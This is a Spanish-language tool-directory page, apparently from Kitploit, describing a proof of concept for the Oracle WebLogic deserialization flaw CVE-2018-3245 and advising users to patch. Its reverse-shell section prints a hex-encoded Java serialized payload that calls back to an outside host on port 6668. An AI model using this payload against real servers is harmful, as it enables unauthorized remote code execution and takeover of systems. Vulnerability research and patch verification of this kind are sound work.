Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-3245 — CVE-2018-3245 | Kitploit
Herramientas/GitHubGitHub/jas502n/cve-2018-3245
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubjas502n/cve-2018-3245

CVE-2018-3245

CVE-2018-3245

Ver Repositorio
1410hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Weblogic-CVE-2018-3245

CVE-2018-3245

0x00 Introducción

El 16 de octubre a nivel local, en la madrugada del 17 de octubre hora de Beijing, Oracle publicó oficialmente la Actualización Crítica de Parches (CPU) de octubre (tercer trimestre),

en la que se corrigió una vulnerabilidad de ejecución remota de código en Weblogic (CVE-2018-2893) que no se había solucionado completamente en el parche de CPU de julio (segundo trimestre). El número de la vulnerabilidad recién corregida es CVE-2018-3245.

Solución

Oracle ya ha corregido esta vulnerabilidad en esta Actualización Crítica de Parches (CPU). Se recomienda encarecidamente a los usuarios afectados que actualicen lo antes posible para protegerse.

Nota: El parche oficial de Oracle requiere que los usuarios tengan una cuenta de licencia de software genuina. Después de iniciar sesión con esa cuenta en https://support.oracle.com, se puede descargar el último parche.

Enlace oficial de CPU de Oracle:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

0x01 Obtener shell reverso

root@kitploit:~
jas502n-poc.txt 

Payload(hex): aced00057372002f636f6d2e73756e2e6a6e64692e726d692e72656769737472792e5265666572656e6365577261707065725f5374756200000000000000020200007872001a6a6176612e726d692e7365727665722e52656d6f746553747562e9fedcc98be1651a0200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e0300007870773b000a556e696361737452656600127777772e63616e796f757365656d652e636300001a0c0000000009e0b68e00000000000000000000000000000078

Descargar herramienta